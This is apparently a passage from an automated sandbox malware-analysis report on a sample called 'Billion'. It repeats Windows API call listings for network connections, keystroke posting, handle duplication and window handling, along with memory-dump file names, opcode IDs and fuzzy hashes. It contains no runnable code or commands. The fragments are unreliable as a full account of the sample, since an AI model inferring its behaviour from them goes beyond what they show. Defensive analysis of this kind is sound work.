                                                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ACD0F
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001ACD67
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 001ACD7B
                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 001ACD86
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001755AE,?,?,Bad directive syntax error,001CDCD0,00000000,00000010,?,?), ref: 0019A236
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,001755AE,?), ref: 0019A23D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0019A301
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 001929F8
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00192A0D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00192A9A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013758D
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001375CE
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001375F6
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013773A
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013775B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1fcfc50aa2616490fdf14d2d90fcdb2ac63c40517bdeaf706cc48d51fe75ea1a
                                                                                                                                                                                                                                                                                                          • Instruction ID: f68e925eca59cc90246258aa002b8b53c013e868f939365a2099b9fdff8288b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fcfc50aa2616490fdf14d2d90fcdb2ac63c40517bdeaf706cc48d51fe75ea1a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E26138B1F00701AFDB25AF79FC95AAD7BA4EF12760F04016DE844EB282DB3198208791
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ACBC7
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001ACBDA
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 001ACBEE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ACCB7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: GetLastError.KERNEL32 ref: 001ACD67
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: SetEvent.KERNEL32(?), ref: 001ACD7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: InternetCloseHandle.WININET(00000000), ref: 001ACD86
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 38d4f47b82b0561e69fca77e38cf0a39b8612321a76d80a41d8d8cda11417101
                                                                                                                                                                                                                                                                                                          • Instruction ID: bee3f401922c9185e674265859d376059b887b0a5606fd4f01c8ebd56a7e6757
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38d4f47b82b0561e69fca77e38cf0a39b8612321a76d80a41d8d8cda11417101
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631AF75100B01AFDB218FB5DD44AABBBF8FF06324B00452DF95A82A10CB31E854EBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F0A
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00192F28
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00192F2C
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F36
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00192F4E
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00192F52
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F5C
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00192F70
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00192F74
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4177f94e69a4587adfb9a69680229bda848ae29b7ec8986a7b87e6a613f13ef8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 516ddfcc4d8da40c2087fc318cd0bc40910bdfa8b9b63255dec75f634e702460
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4177f94e69a4587adfb9a69680229bda848ae29b7ec8986a7b87e6a613f13ef8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8401D830784224BBFB1067689C8AF593F59EB5DB11F120025F358AE1E0C9F25444CAA9
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00191D95,?,?,00000000), ref: 00192159
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 00192160
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00191D95,?,?,00000000), ref: 00192175
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00191D95,?,?,00000000), ref: 0019217D
                                                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 00192180
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00191D95,?,?,00000000), ref: 00192190
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00191D95,00000000,?,00191D95,?,?,00000000), ref: 00192198
                                                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 0019219B
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,001921C1,00000000,00000000,00000000), ref: 001921B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 56840f6c262a76003530c3e1237d6e0cfb2fef51087121382ac3f748a647fc82
                                                                                                                                                                                                                                                                                                          • Instruction ID: c607e74ba768e20fe5f8c90737a0907cdb50a4953152e9c5f143b9e4a441aea7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56840f6c262a76003530c3e1237d6e0cfb2fef51087121382ac3f748a647fc82
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01A8B5640344BFEA10ABA5EC49F6B7BACEB88711F454425FA05DB5A1CA70D840CA20
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0019CF99
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019CFE0
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0019D047
                                                                                                                                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0019D075
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                          • String ID: ,* $0$<*
                                                                                                                                                                                                                                                                                                          • API String ID: 1227352736-1325340096
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3bda65d5cd709a4bcc8fdf2fe7760d2af747fede409a8db0db58285e4a3bffff
                                                                                                                                                                                                                                                                                                          • Instruction ID: 45b538f6a0ff2cc37fb216a7cd684ab93a2babee79ebc3b9bc6ec852f3b2146d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bda65d5cd709a4bcc8fdf2fe7760d2af747fede409a8db0db58285e4a3bffff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51F1316043009BDB14AF28E889B6BBBE8AF99314F080A2DF995D31D1DB70CD49C792
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001C43C1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001C43D6
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001C43F0
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C4435
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001C4462
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001C4490
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                          • Opcode ID: 792899f3c57c0601564d9615aa1a9537d2dd909c064ddf7f4196d9aba3bf9552
                                                                                                                                                                                                                                                                                                          • Instruction ID: a0ad2ef293c78336d021fabebbceeb54b8daea7dd68ec676c6d820f6825cb08a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 792899f3c57c0601564d9615aa1a9537d2dd909c064ddf7f4196d9aba3bf9552
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D41AC71A04319ABDF21DF64CC49FEA7BA9FB68360F10012AF958E7291D774D980CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019C6C4
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 0019C6E4
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0019C71A
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(00C15120), ref: 0019C76B
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(00C15120,?,00000001,00000030), ref: 0019C793
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                          • Opcode ID: 572944f05360408039c426b2c28b9e0dcbea1d9dc25ad470ddd8a3f2b8275b2c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 481e01e5a3d166c41ec722f4e46e9f6c5e9379c2ff42350534fb19797cb2e6a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 572944f05360408039c426b2c28b9e0dcbea1d9dc25ad470ddd8a3f2b8275b2c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51B070A00205ABDF18CFF8D9C4BAEBBF5AF59314F24412AE99197291D3709945CFE2
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00131B35
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00131B99
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00131BB6
                                                                                                                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00131BC7
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00131C15
                                                                                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00173287
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131C2D: BeginPath.GDI32(00000000), ref: 00131C4B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3050599898-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 85c7314640d4cbdbc988caab4f41d456752fb09a6c207b9d78e614fa2a94c0d3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2605438bebcdaffff387fcc9fabf9505219f63018e3529675f2036a8ad545b01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c7314640d4cbdbc988caab4f41d456752fb09a6c207b9d78e614fa2a94c0d3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C141A170205304EFD711DF24EC88FB67BB8EF55324F140669FAA9872A2C7319949DB62
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C8740
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001C8765
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001C877D
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001C87A6
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001AC1F2,00000000), ref: 001C87C6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001C87B1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
